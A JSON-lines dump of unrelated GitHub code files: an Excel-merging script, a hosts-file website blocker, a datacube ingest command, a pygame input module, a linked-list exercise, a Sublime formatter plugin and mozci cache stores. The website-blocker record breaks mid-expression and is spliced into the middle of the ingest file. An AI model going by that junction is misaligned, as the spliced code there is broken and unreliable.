제거하기\nsrc3df = src3df.drop(src3df.columns[[0,1]], axis=1)\nprint(src3df.head())\n\n\nfor year in range(2017, 2024):\n src1Filename = '1_가공실적_전체_' + str(year) + '.xlsx'\n src2AFilename = '2A_선행도장_전체_' + str(year) + '.xlsx'\n src2BFilename = '2B_선행도장_전체_' + str(year) + '.xlsx'\n src3Filename = '3_조립실적_전체_' + str(year) + '.xlsx'\n\n temp_src1df = pd.read_excel(srcDirectory + src1Filename)\n temp_src1df = temp_src1df.drop(temp_src1df.columns[0], axis=1)\n src1df['1.가공>중량'] = src1df['1.가공>중량'] + temp_src1df['1.가공>중량']\n src1df['1.가공>절단장'] = src1df['1.가공>절단장'] + temp_src1df['1.가공>절단장']\n\n temp_src2Adf = pd.read_excel(srcDirectory + src2AFilename)\n temp_src2Adf = temp_src2Adf.drop(temp_src2Adf.columns[0], axis=1)\n src2Adf['2A.선행도장>표면처리'] = src2Adf['2A.선행도장>표면처리'] + temp_src2Adf['2A.선행도장>표면처리']\n\n temp_src2Bdf = pd.read_excel(srcDirectory + src2BFilename)\n temp_src2Bdf = temp_src2Bdf.drop(temp_src2Bdf.columns[0], axis=1)\n src2Bdf['2B.선행도장>도장'] = src2Bdf['2B.선행도장>도장'] + temp_src2Bdf['2B.선행도장>도장']\n \n temp_src3df = pd.read_excel(srcDirectory + src3Filename)\n temp_src3df = temp_src3df.drop(temp_src3df.columns[0], axis=1)\n src3df['3.조립>중량'] = src3df['3.조립>중량'] + temp_src3df['3.조립>중량']\n src3df['3.조립>용접장'] = src3df['3.조립>용접장'] + temp_src3df['3.조립>용접장']\n src3df['3.조립>용착량'] = src3df['3.조립>용착량'] + temp_src3df['3.조립>용착량']\n\n\ndfCombined = pd.concat([src1df,src2Adf,src2Bdf,src3df], axis=1)\nprint(dfCombined.head())\n\nif True:\n print(\"save to : \", dstDirectory + dstFilename)\n dfCombined.to_excel(dstDirectory + dstFilename)","repo_name":"eyedicamp/ElectricityUseRegression","sub_path":"Raw 데이터 처리 로직 개발 (가공, 도장, 조립)/5.2 병합용 파이썬 코드/Combine dataframes.py","file_name":"Combine dataframes.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11602856124","text":"import time \r\nfrom datetime import datetime as dt\r\n\r\npath=r\"C:/windows/system32/drivers/etc/hosts\"\r\n\r\ndirect=\"127.0.0.1\"\r\nl=[]\r\nn=int(input(\"Enter the number of websites to be blocked\"))\r\nprint(\"Enter the url of the website\")\r\nfor i in range(n):\r\n x=input()\r\n l.append(x) \r\n \r\n\r\n\r\nif dt(dt.now().year,dt.now().month,dt.now().day,8) (DatasetType, DatasetType)\n \"\"\"\n Create the output product for the given ingest config if it doesn't already exist.\n\n It will throw a ValueError if the config already exists but differs from the existing.\n Set allow_product_changes=True to allow changes.\n \"\"\"\n\n index = driver_manager.index\n source_type = index.products.get_by_name(config['source_type'])\n if not source_type:\n click.echo(\"Source DatasetType %s does not exist\" % config['source_type'])\n click.get_current_context().exit(1)\n\n output_type = morph_dataset_type(source_type, config, driver_manager)\n _LOG.info('Created DatasetType %s', output_type.name)\n\n existing = index.products.get_by_name(output_type.name)\n if existing:\n can_update, safe_changes, unsafe_changes = index.products.can_update(output_type)\n if safe_changes or unsafe_changes:\n if not allow_product_changes:\n raise ValueError(\"Ingest config differs from the existing output product, \"\n \"but allow_product_changes=False\")\n output_type = index.products.update(output_type)\n else:\n output_type = index.products.add(output_type)\n\n return source_type, output_type\n\n\n@cachetools.cached(cache={}, key=lambda index, id_: id_)\ndef get_full_lineage(index, id_):\n return index.datasets.get(id_, include_sources=True)\n\n\ndef load_config_from_file(index, config):\n config_name = Path(config).name\n _, config = next(read_documents(Path(config)))\n config['filename'] = config_name\n\n return config\n\n\ndef create_task_list(driver_manager, output_type, year, source_type, config):\n config['taskfile_version'] = int(time.time())\n\n query = {}\n if year:\n query['time'] = Range(datetime(year=year[0], month=1, day=1), datetime(year=year[1] + 1, month=1, day=1))\n if 'ingestion_bounds' in config:\n bounds = config['ingestion_bounds']\n query['x'] = Range(bounds['left'], bounds['right'])\n query['y'] = Range(bounds['bottom'], bounds['top'])\n\n time_size = 1\n if 'time' in config['storage']['tile_size']:\n time_size = config['storage']['tile_size']['time']\n\n tasks = find_diff(source_type, output_type, driver_manager, time_size, **query)\n _LOG.info('%s tasks discovered', len(tasks))\n\n def check_valid(tile, tile_index):\n if FUSER_KEY in config:\n return True\n\n require_fusing = [source for source in tile.sources.values if len(source) > 1]\n if require_fusing:\n _LOG.warning('Skipping %s - no \"%s\" specified in config: %s', tile_index, FUSER_KEY, require_fusing)\n\n return not require_fusing\n\n def update_sources(sources):\n return tuple(get_full_lineage(driver_manager.index, dataset.id) for dataset in sources)\n\n def update_task(task):\n tile = task['tile']\n for i in range(tile.sources.size):\n tile.sources.values[i] = update_sources(tile.sources.values[i])\n return task\n\n tasks = (update_task(task) for task in tasks if check_valid(**task))\n return tasks\n\n\ndef ingest_work(driver_manager, config, source_type, output_type, tile, tile_index):\n _LOG.info('Starting task %s', tile_index)\n\n namemap = get_namemap(config)\n measurements = get_measurements(source_type, config)\n variable_params = get_variable_params(config)\n global_attributes = config['global_attributes']\n\n with datacube.set_options(reproject_threads=1):\n fuse_func = {'copy': None}[config.get(FUSER_KEY, 'copy')]\n data = Datacube.load_data(tile.sources, tile.geobox, measurements,\n fuse_func=fuse_func, driver_manager=driver_manager)\n nudata = data.rename(namemap)\n file_path = get_filename(config, tile_index, tile.sources)\n\n def _make_dataset(labels, sources):\n return make_dataset(product=output_type,\n sources=sources,\n extent=tile.geobox.extent,\n center_time=labels['time'],\n uri=file_path.absolute().as_uri(),\n app_info=get_app_metadata(config, config['filename']),\n valid_data=GeoPolygon.from_sources_extents(sources, tile.geobox))\n\n datasets = xr_apply(tile.sources, _make_dataset, dtype='O') # Store in Dataarray to associate Time -> Dataset\n nudata['dataset'] = datasets_to_doc(datasets)\n\n # Until ingest becomes a class and DriverManager an instance\n # variable, we call the constructor each time. DriverManager being\n # a singleton, there is little overhead, though.\n datasets.attrs['storage_output'] = driver_manager.write_dataset_to_storage(nudata,\n file_path,\n global_attributes,\n variable_params)\n _LOG.info('Finished task %s', tile_index)\n\n # When using multiproc executor, Driver Manager is a clone.\n if driver_manager.is_clone:\n driver_manager.close()\n\n return datasets\n\n\ndef _index_datasets(driver_manager, results):\n n = 0\n for datasets in results:\n n += driver_manager.index_datasets(datasets, sources_policy='verify')\n return n\n\n\ndef process_tasks(driver_manager, config, source_type, output_type, tasks, queue_size, executor):\n def submit_task(task):\n _LOG.info('Submitting task: %s', task['tile_index'])\n return executor.submit(ingest_work,\n driver_manager=driver_manager,\n config=config,\n source_type=source_type,\n output_type=output_type,\n **task)\n\n pending = []\n n_successful = n_failed = 0\n\n tasks = iter(tasks)\n while True:\n pending += [submit_task(task) for task in itertools.islice(tasks, max(0, queue_size - len(pending)))]\n if not pending:\n break\n\n completed, failed, pending = executor.get_ready(pending)\n _LOG.info('completed %s, failed %s, pending %s', len(completed), len(failed), len(pending))\n\n for future in failed:\n try:\n executor.result(future)\n except Exception: # pylint: disable=broad-except\n _LOG.exception('Task failed')\n n_failed += 1\n\n if not completed:\n time.sleep(1)\n continue\n\n try:\n # TODO: ideally we wouldn't block here indefinitely\n # maybe limit gather to 50-100 results and put the rest into a index backlog\n # this will also keep the queue full\n n_successful += _index_datasets(driver_manager, executor.results(completed))\n except Exception: # pylint: disable=broad-except\n _LOG.exception('Gather failed')\n pending += completed\n\n return n_successful, n_failed\n\n\ndef _validate_year(ctx, param, value):\n try:\n if value is None:\n return None\n years = list(map(int, value.split('-', 2)))\n if len(years) == 1:\n return years[0], years[0]\n return tuple(years)\n except ValueError:\n raise click.BadParameter('year must be specified as a single year (eg 1996) '\n 'or as an inclusive range (eg 1996-2001)')\n\n\n@cli.command('ingest', help=\"Ingest datasets\")\n@click.option('--config-file', '-c',\n type=click.Path(exists=True, readable=True, writable=False, dir_okay=False),\n help='Ingest configuration file')\n@click.option('--year', callback=_validate_year, help='Limit the process to a particular year')\n@click.option('--queue-size', type=click.IntRange(1, 100000), default=3200, help='Task queue size')\n@click.option('--save-tasks', help='Save tasks to the specified file',\n type=click.Path(exists=False))\n@click.option('--load-tasks', help='Load tasks from the specified file',\n type=click.Path(exists=True, readable=True, writable=False, dir_okay=False))\n@click.option('--dry-run', '-d', is_flag=True, default=False, help='Check if everything is ok')\n@click.option('--allow-product-changes', is_flag=True, default=False,\n help='Allow the output product definition to be updated if it differs.')\n@ui.executor_cli_options\n@ui.pass_driver_manager(app_name='agdc-ingest')\ndef ingest_cmd(driver_manager,\n config_file,\n year,\n queue_size,\n save_tasks,\n load_tasks,\n dry_run,\n executor,\n allow_product_changes):\n index = driver_manager.index\n if config_file:\n config = load_config_from_file(index, config_file)\n source_type, output_type = ensure_output_type(driver_manager, config,\n allow_product_changes=allow_product_changes)\n\n tasks = create_task_list(driver_manager, output_type, year, source_type, config)\n elif load_tasks:\n config, tasks = load_tasks_(load_tasks)\n source_type, output_type = ensure_output_type(driver_manager, config,\n allow_product_changes=allow_product_changes)\n else:\n click.echo('Must specify exactly one of --config-file, --load-tasks')\n return 1\n\n if dry_run:\n check_existing_files(get_filename(config, task['tile_index'], task['tile'].sources) for task in tasks)\n return 0\n\n if save_tasks:\n save_tasks_(config, tasks, save_tasks)\n return 0\n\n successful, failed = process_tasks(driver_manager, config, source_type, output_type, tasks, queue_size, executor)\n click.echo('%d successful, %d failed' % (successful, failed))\n\n return 0\n","repo_name":"benjimin/pully","sub_path":"datacube/scripts/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":16016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37515873795","text":"from globvar import *\r\nfrom utilities import map_load\r\nfrom game_objects import player_object\r\nbullets=[]\r\nplayer = player_object((350,350),bullets.append)\r\nmap_info = map_load(\"BoogieWonderland\")\r\n\r\ndef key_interact(position):\r\n global aHeld, wHeld, sHeld, dHeld, player\r\n\r\n key_pressed = pygame.key.get_pressed()\r\n if key_pressed[pygame.K_RIGHT]:\r\n player.speen(1)\r\n elif key_pressed[pygame.K_LEFT]:\r\n player.speen(3)\r\n elif key_pressed[pygame.K_UP]:\r\n player.speen(2)\r\n elif key_pressed[pygame.K_DOWN]:\r\n player.speen(0)\r\n \r\n if key_pressed[pygame.K_a]:\r\n if not aHeld:\r\n player.altMove(1)\r\n aHeld = True\r\n else:\r\n aHeld = False\r\n\r\n if key_pressed[pygame.K_w]:\r\n if not wHeld:\r\n player.altMove(2)\r\n wHeld = True\r\n else:\r\n wHeld = False\r\n\r\n if key_pressed[pygame.K_d]:\r\n if not dHeld:\r\n player.altMove(3)\r\n dHeld = True\r\n else:\r\n dHeld = False\r\n\r\n if key_pressed[pygame.K_s]:\r\n if not sHeld:\r\n player.altMove(4)\r\n sHeld = True\r\n else:\r\n sHeld = False\r\ndef shootCheck():\r\n global spaceHeld\r\n key_pressed = pygame.key.get_pressed()\r\n if key_pressed[pygame.K_SPACE]:\r\n if not spaceHeld:\r\n player.shoot()\r\n spaceHeld = True\r\n else:\r\n spaceHeld = False\r\n\r\ndef asteroid_movement():\r\n for asteroid in map_info:\r\n asteroid.draw(screen)\r\n asteroid.move()\r\n test=0\r\n track = asteroid.move()\r\n if track > width + 100:\r\n map_info.remove(asteroid)\r\n if len(map_info) <= 0:\r\n pygame.quit()\r\n quit() #eventually make this return a boolean for whether or not map is done to end the gameloop process/do menu stuff\r\n","repo_name":"code-scary/rhythm-game","sub_path":"rhythm game/game_actions.py","file_name":"game_actions.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26889674396","text":"class Node():\t#노드 선언\n\tdef __init__(self, data, next = None):\n\t\tself.data = data\n\t\tself.next = next\n \nclass SimplyLinkedList():\n\tdef __init__(self):\n\t\tself.head = None\n \n\tdef link(self, node, next): #노드 연결\n\t\tnode.next = next\n \n\tdef getTail(self): #꼬리 노드 불러오기\n\t\tcurrentNode = self.head\n\t\twhile currentNode.next:\n\t\t\tcurrentNode = currentNode.next\n\t\treturn currentNode\n \n\tdef getIndex(self, data): #data의 인덱스 반환\n\t\tcurrentNode = self.head\n\t\tindex = 0\n\t\twhile currentNode.data != data:\n\t\t\tcurrentNode = currentNode.next\n\t\t\tindex += 1\n\t\treturn index\n \n\tdef getNum(self, index):\t#index의 값 반환\n\t\tcurrentNode = self.head\n\t\tfor i in range(index):\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\treturn currentNode.data\n \n\tdef append(self, data): #tail에 추가, 빈 리스트일경우, head에.\n\t\tif self.head == None:\n\t\t\tself.head = Node(data) \n\t\telse:\n\t\t\ttail = self.getTail()\n\t\t\ttail.next = Node(data)\n \n\tdef appendhead(self, data): #head에 추가\n\t\tself.head = Node(data, self.head)\n \n\tdef insertAt(self, data, index):\t#이 인덱스에 삽입\n\t\tcurrentNode = self.head\n\t\tfor i in range(index):\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tprevNode.next = Node(data)\n\t\tself.link(prevNode.next, currentNode)\n \n\tdef insertBeforeThisNumber(self, data, target_num): #이 번호 앞에 삽입\n\t\tcurrentNode = self.head\n\t\twhile currentNode.data != target_num:\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tprevNode.next = Node(data)\n\t\tself.link(prevNode.next, currentNode)\n \n\tdef insertAfterThisNumber(self, data, target_num): #이 번호 뒤에 삽입\n\t\tcurrentNode = self.head\n\t\twhile currentNode.data != target_num:\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tprevNode = currentNode\n\t\tcurrentNode = currentNode.next\n\t\tprevNode.next = Node(data)\n\t\tself.link(prevNode.next, currentNode)\n \n\tdef pop(self):\t#맨 끝 삭제\n\t\tcurrentNode = self.head\n\t\twhile currentNode.next:\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tprevNode.next = None\n \n\tdef pophead(self):\t#맨 앞 삭제\n\t\theadNode = self.head\n\t\tself.head = self.head.next\n\t\theadNode.next = None\n \n\tdef popAt(self, index):\t#특정 인덱스 pop\n\t\tcurrentNode = self.head\n\t\tfor i in range(index):\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tif currentNode.next:\n\t\t\tself.link(prevNode, currentNode.next)\n\t\t\tcurrentNode = None\n \n\tdef popIt(self, data):\t#특정 값 pop\n\t\tcurrentNode = self.head\n\t\twhile currentNode.data != data:\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tprevNode = currentNode\n\t\tcurrentNode = currentNode.next\n\t\tif currentNode.data == data:\n\t\t\tself.link(prevNode, currentNode.next)\n \n\tdef printList(self):\t#프린트\n\t\tcurrentNode = self.head\n\t\twhile currentNode.next:\n\t\t\tprint(currentNode.data)\n\t\t\tcurrentNode = currentNode.next\n\t\tprint(currentNode.data)\n \n\tdef listMerge(self, nextList):\t#리스트 병합\n\t\ttail = self.getTail()\n\t\tself.link(tail, nextList.head)\n \nnode1 = Node(7)\t#7을 가진 노드 생성\nnode2 = Node(3) #3을 가진 노드 생성\n\nList1 = SimplyLinkedList() #리스트1 생성\nList2 = SimplyLinkedList() #리스트2 생성\n\nList1.head = node1 \t #리스트1의 head를 node1로 설정\nList1.link(node1, node2)\t#node1의 다음 노드를 node2로 지정\nList2.append(4)\t\t\t\t#리스트2에 4를 가진 노드 추가\nList1.appendhead(780)\t\t#리스트1의 head를 780을 가진 노드로 설정\nList2.insertAfterThisNumber(60, 4) #리스트2의 4 뒤에 60 삽입\nList1.insertAt(68, 1) #List1의 1인덱스자리에 68을 가진 노드 넣기(기존 값들은 밀려남)\nList2.append(200)\t #리스트2의 맨 끝에 200을 가진 노드 추가\nList2.popAt(1)\t\t #리스트2의 1인덱스자리의 노드(60을 가진 노드) 제거\nList1.listMerge(List2)#리스트1 - 리스트2 합치기(연결)\n\nList1.printList()\t #리스트1 출력","repo_name":"fudoge/BOJ-practice","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37166593339","text":"import sublime\nimport sublime_plugin\nimport subprocess\nimport os\nimport re\nimport shutil\n# import inspect\n\nSETTINGS_FILE = \"SemiStandardFormat.sublime-settings\"\n\n# load settings\nsettings = None\nplatform = sublime.platform()\nglobal_path = os.environ[\"PATH\"]\nselectors = {}\n\nSYNTAX_RE = re.compile(r'(?i)/([^/]+)\\.(?:tmLanguage|sublime-syntax)$')\n\n# Initialize a global path. Works on all OSs\n\n\ndef calculate_user_path():\n \"\"\"execute a user shell to return a real env path\"\"\"\n shell_command = settings.get(\"get_path_command\")\n user_path = (\n subprocess.check_output(shell_command)\n .decode(\"utf-8\")\n .split('\\n')[0]\n )\n return user_path\n\n\ndef search_for_bin_paths(path, view_path_array=[]):\n dirname = path if os.path.isdir(path) else os.path.dirname(path)\n maybe_bin_path = os.path.join(dirname, 'node_modules', '.bin')\n found_path = os.path.isdir(maybe_bin_path)\n if found_path:\n view_path_array = view_path_array + [maybe_bin_path]\n return (\n view_path_array if os.path.ismount(dirname)\n else search_for_bin_paths(os.path.dirname(dirname), view_path_array)\n )\n\n\ndef get_view_path(path_string):\n \"\"\"\n walk the fs from the current view to find node_modules/.bin\n \"\"\"\n project_path = search_for_bin_paths(path_string)\n return os.pathsep.join(project_path)\n\n\ndef get_project_path(view):\n \"\"\"\n generate path of node_module/.bin for open project folders\n \"\"\"\n parent_window_folders = view.window().folders()\n project_path = (\n [get_view_path(folder) for folder in parent_window_folders] if\n parent_window_folders\n else []\n )\n return os.pathsep.join(list(filter(None, project_path)))\n\n\ndef generate_search_path(view):\n \"\"\"\n run necessary work to generate a search path\n \"\"\"\n search_path = settings.get(\"PATH\")\n if not isinstance(search_path, list):\n print(\"SemiStandardFormat: PATH in settings does not appear to be an array\")\n search_path = []\n if settings.get(\"use_view_path\"):\n if view.file_name():\n search_path = search_path + [get_view_path(view.file_name())]\n elif settings.get(\"use_project_path_fallback\"):\n search_path = search_path + [get_project_path(view)]\n if settings.get(\"use_global_path\"):\n search_path = search_path + [global_path]\n search_path = list(filter(None, search_path))\n new_path = os.pathsep.join(search_path)\n\n return new_path\n\n\ndef get_command(commands):\n \"\"\"\n Tries to validate and return a working formatting command\n \"\"\"\n for command in commands:\n if shutil.which(command[0]):\n return command\n return None\n\n\ndef print_status(global_path, search_path):\n command = get_command(settings.get(\"commands\"))\n print(\"SemiStandardFormat:\")\n print(\" global_path: {}\".format(global_path))\n print(\" search_path: {}\".format(search_path))\n if command:\n print(\" found {} at {}\".format(command[0], shutil.which(command[0])))\n print(\" command: {}\".format(command))\n if settings.get(\"check_version\"):\n print(\n \" {} version: {}\"\n .format(command[0], command_version(command[0]))\n )\n\n\ndef plugin_loaded():\n \"\"\"\n perform some work to set up env correctly.\n \"\"\"\n global global_path\n global settings\n settings = sublime.load_settings(SETTINGS_FILE)\n view = sublime.active_window().active_view()\n if platform != \"windows\":\n global_path = calculate_user_path()\n search_path = generate_search_path(view)\n os.environ[\"PATH\"] = search_path\n print_status(global_path, search_path)\n\n\nclass SemiStandardFormatEventListener(sublime_plugin.EventListener):\n\n def on_pre_save(self, view):\n if settings.get(\"format_on_save\") and is_javascript(view):\n os.chdir(os.path.dirname(view.file_name()))\n view.run_command(\"semi_standard_format\")\n\n def on_activated_async(self, view):\n search_path = generate_search_path(view)\n os.environ[\"PATH\"] = search_path\n if is_javascript(view) and settings.get(\"logging_on_view_change\"):\n print_status(global_path, search_path)\n\n\ndef is_javascript(view):\n \"\"\"\n Checks if the current view is JS or not. Used in pre_save event.\n \"\"\"\n # Check the file extension\n name = view.file_name()\n extensions = set(settings.get('extensions'))\n if name and os.path.splitext(name)[1][1:] in extensions:\n return True\n # If it has no name (?) or it's not a JS, check the syntax\n syntax = view.settings().get(\"syntax\")\n if syntax and \"javascript\" in syntax.split(\"/\")[-1].lower():\n return True\n return False\n\n\ndef semistandard_format(string, command):\n \"\"\"\n Uses subprocess to format a given string.\n \"\"\"\n\n startupinfo = None\n\n if platform == \"windows\":\n # Prevent cmd.exe window from popping up\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= (\n subprocess.STARTF_USESTDHANDLES | subprocess.STARTF_USESHOWWINDOW\n )\n startupinfo.wShowWindow = subprocess.SW_HIDE\n\n std = subprocess.Popen(\n command,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n startupinfo=startupinfo\n )\n\n std.stdin.write(bytes(string, 'UTF-8'))\n out, err = std.communicate()\n print(err)\n return out.decode(\"utf-8\"), None\n\n\ndef command_version(command):\n \"\"\"\n Uses subprocess to format a given string.\n \"\"\"\n\n startupinfo = None\n\n if platform == \"windows\":\n # Prevent cmd.exe window from popping up\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= (\n subprocess.STARTF_USESTDHANDLES | subprocess.STARTF_USESHOWWINDOW\n )\n startupinfo.wShowWindow = subprocess.SW_HIDE\n\n std = subprocess.Popen(\n [command, \"--version\"],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n startupinfo=startupinfo\n )\n out, err = std.communicate()\n return out.decode(\"utf-8\").replace(\"\\r\", \"\"), err\n\n\nclass SemiStandardFormatCommand(sublime_plugin.TextCommand):\n\n def run(self, edit):\n # Figure out if the desired formatter is available\n command = get_command(settings.get(\"commands\"))\n if platform == \"windows\" and command is not None:\n # Windows hax\n command[0] = shutil.which(command[0])\n if not command:\n # Noop if we don't have the right tools.\n return None\n view = self.view\n\n view_syntax = view.settings().get('syntax', '')\n\n if view_syntax:\n match = SYNTAX_RE.search(view_syntax)\n\n if match:\n view_syntax = match.group(1).lower()\n else:\n view_syntax = ''\n\n if view_syntax and view_syntax in settings.get('extensions', []):\n selectors = settings.get(\"selectors\")\n selector = selectors[view_syntax]\n else:\n selector = None\n\n os.chdir(os.path.dirname(view.file_name()))\n\n regions = []\n # sel = view.sel()\n\n if selector:\n regions = view.find_by_selector(selector)\n else:\n allreg = sublime.Region(0, view.size())\n regions.append(allreg)\n\n for region in regions:\n self.do_format(edit, region, view, command)\n\n def do_format(self, edit, region, view, command):\n s = view.substr(region)\n s, err = semistandard_format(s, command)\n if not err and len(s) > 0:\n view.replace(edit, region, s)\n elif err:\n loud = settings.get(\"loud_error\")\n msg = 'SemiStandardFormat: error formatting selection(s)'\n print(msg)\n if settings.get(\"log_errors\"):\n print(err)\n sublime.error_message(msg) if loud else sublime.status_message(msg)\n\n\nclass ToggleSemiStandardFormatCommand(sublime_plugin.TextCommand):\n\n def run(self, edit):\n if settings.get('format_on_save', False):\n settings.set('format_on_save', False)\n sublime.status_message(\"Format on save: Off\")\n else:\n settings.set('format_on_save', True)\n sublime.status_message(\"Format on save: On\")\n sublime.save_settings(SETTINGS_FILE)\n\n def is_checked(self):\n return settings.get('format_on_save', False)\n","repo_name":"ppxu/sublime-semistandard-format","sub_path":"semistandard-format.py","file_name":"semistandard-format.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"72021901593","text":"# -*- coding: utf-8 -*-\nimport os\nimport pickle\nimport shutil\nimport tarfile\nimport tempfile\nimport threading\nfrom distutils.dir_util import copy_tree\n\nimport taskcluster\nfrom cachy.contracts.store import Store\nfrom cachy.serializers import Serializer\nfrom cachy.stores import FileStore, NullStore # noqa\nfrom loguru import logger\n\nfrom mozci.util.req import get_session\nfrom mozci.util.taskcluster import get_taskcluster_options\n\n\ndef extract_tar_zst(path, dest):\n import zstandard\n\n dctx = zstandard.ZstdDecompressor()\n with open(path, \"rb\") as f:\n with dctx.stream_reader(f) as reader:\n with tarfile.open(mode=\"r|\", fileobj=reader) as tar:\n tar.extractall(dest)\n\n\nclass SeededFileStore(FileStore):\n RESEED_KEY = \"mozci:SeededFileStore:reseed\"\n\n def __init__(self, config):\n \"\"\"A FileStore instance that allows pre-seeding the cache from an archive\n downloaded from a URL.\n\n Example configuration:\n\n file = {\n driver = \"seeded-file\",\n path = \"/path/to/cache\",\n url = \"https://example.com/cache.tar.gz\"\n }\n\n Configuration can include:\n\n path: Path on the local file system to store the cache.\n url: Where to download the preseed data from.\n archive_relpath: Path within the archive pointing to the root of the cache data.\n reseed_interval: Time in minutes after which the data will be\n seeded again (defaults to no reseeding).\n\n Supported archive formats include `.zip`, `.tar`, `.tar.gz`, `.tar.bz2` or `.tar.zst`.\n \"\"\"\n self._url = config[\"url\"]\n self._reseed_interval = config.get(\"reseed_interval\", 0)\n self._archive_relpath = config.get(\"archive_relpath\")\n\n self._session = get_session()\n\n kwargs = {\n \"directory\": config[\"path\"],\n }\n if \"hash_type\" in config:\n kwargs[\"hash_type\"] = config[\"hash_type\"]\n\n super(SeededFileStore, self).__init__(**kwargs)\n\n def seed(self):\n \"\"\"Download and extract the seed data to the cache directory.\"\"\"\n logger.info(\n f\"Seeding mozci cache at {self._directory} with contents from {self._url}\"\n )\n self._create_cache_directory(self._directory)\n\n filename = self._url.split(\"/\")[-1]\n with self._session.get(self._url, stream=True) as r:\n r.raise_for_status()\n\n with tempfile.TemporaryDirectory() as tempdir:\n with tempfile.NamedTemporaryFile(suffix=filename) as fh:\n shutil.copyfileobj(r.raw, fh)\n\n if filename.endswith(\".tar.zst\"):\n extract_tar_zst(fh.name, tempdir)\n else:\n shutil.unpack_archive(fh.name, tempdir)\n\n path = tempdir\n if self._archive_relpath:\n path = os.path.join(tempdir, self._archive_relpath)\n\n copy_tree(path, self._directory)\n\n # Make sure we don't reseed again for another 'reseed_interval' minutes.\n self.put(self.RESEED_KEY, False, self._reseed_interval)\n\n def get(self, key):\n reseed = super(SeededFileStore, self).get(self.RESEED_KEY)\n if reseed is None:\n self.seed()\n\n return super(SeededFileStore, self).get(key)\n\n\nclass RenewingFileStore(FileStore):\n def __init__(self, config, retention):\n \"\"\"A FileStore instance that renews items in the cache when they are\n accessed again.\n \"\"\"\n kwargs = {\n \"directory\": config[\"path\"],\n }\n if \"hash_type\" in config:\n kwargs[\"hash_type\"] = config[\"hash_type\"]\n\n self.retention = retention\n\n super(RenewingFileStore, self).__init__(**kwargs)\n\n def get(self, key):\n value = super(RenewingFileStore, self).get(key)\n if value is None:\n return None\n\n self.put(key, value, self.retention)\n return value\n\n\ndef get_s3_credentials(bucket, prefix):\n auth = taskcluster.Auth(get_taskcluster_options())\n response = auth.awsS3Credentials(\"read-write\", bucket, prefix)\n return response[\"credentials\"]\n\n\nS3_CLIENTS_LOCK = threading.Lock()\nS3_CLIENTS = {}\n\n\ndef get_s3_client(bucket, prefix):\n import boto3\n\n with S3_CLIENTS_LOCK:\n if (bucket, prefix) not in S3_CLIENTS:\n credentials = get_s3_credentials(bucket, prefix)\n S3_CLIENTS[(bucket, prefix)] = boto3.client(\n \"s3\",\n aws_access_key_id=credentials[\"accessKeyId\"],\n aws_secret_access_key=credentials[\"secretAccessKey\"],\n aws_session_token=credentials[\"sessionToken\"],\n )\n\n return S3_CLIENTS[(bucket, prefix)]\n\n\ndef destroy_s3_client(bucket, prefix):\n with S3_CLIENTS_LOCK:\n del S3_CLIENTS[(bucket, prefix)]\n\n\nclass S3Store(Store):\n def __init__(self, config):\n \"\"\"A Store instance that stores items in S3.\"\"\"\n self._bucket = config[\"bucket\"]\n self._prefix = config[\"prefix\"]\n\n @property\n def _client(self):\n return get_s3_client(self._bucket, self._prefix)\n\n def _key(self, key):\n return os.path.join(self._prefix, key)\n\n def _retry_if_expired(self, op):\n import botocore\n\n try:\n return op()\n except botocore.exceptions.ClientError:\n destroy_s3_client(self._bucket, self._prefix)\n return op()\n\n def _forget(self, key):\n self._client.delete_object(Bucket=self._bucket, Key=self._key(key))\n # Should return False if the item was not present in the cache, but we\n # don't care.\n return True\n\n def forget(self, key):\n return self._retry_if_expired(lambda: self._forget(key))\n\n def _get(self, key):\n import botocore\n\n # Copy the object onto itself to extend its expiration.\n try:\n head = self._client.head_object(Bucket=self._bucket, Key=self._key(key))\n\n # Change its metadata, or Amazon will complain.\n metadata = head[\"Metadata\"]\n metadata[\"id\"] = \"1\" if \"id\" in metadata and metadata[\"id\"] == \"0\" else \"0\"\n\n self._client.copy_object(\n Bucket=self._bucket,\n CopySource={\"Bucket\": self._bucket, \"Key\": self._key(key)},\n Key=self._key(key),\n Metadata=metadata,\n MetadataDirective=\"REPLACE\",\n )\n except botocore.exceptions.ClientError as ex:\n if ex.response[\"Error\"][\"Code\"] == \"404\":\n return None\n raise\n\n response = self._client.get_object(Bucket=self._bucket, Key=self._key(key))\n data = response[\"Body\"].read()\n try:\n return self.unserialize(data)\n except Exception:\n # The object is broken, let's delete it.\n self.forget(key)\n return None\n\n def get(self, key):\n return self._retry_if_expired(lambda: self._get(key))\n\n def _put(self, key, value):\n self._client.put_object(\n Body=self.serialize(value), Bucket=self._bucket, Key=self._key(key)\n )\n\n def put(self, key, value, minutes):\n self._retry_if_expired(lambda: self._put(key, value))\n\n\nclass CompressedPickleSerializer(Serializer):\n def __init__(self):\n import zstandard\n\n self.compressor = zstandard.ZstdCompressor(\n level=zstandard.MAX_COMPRESSION_LEVEL\n )\n self.decompressor = zstandard.ZstdDecompressor()\n\n def serialize(self, data):\n return 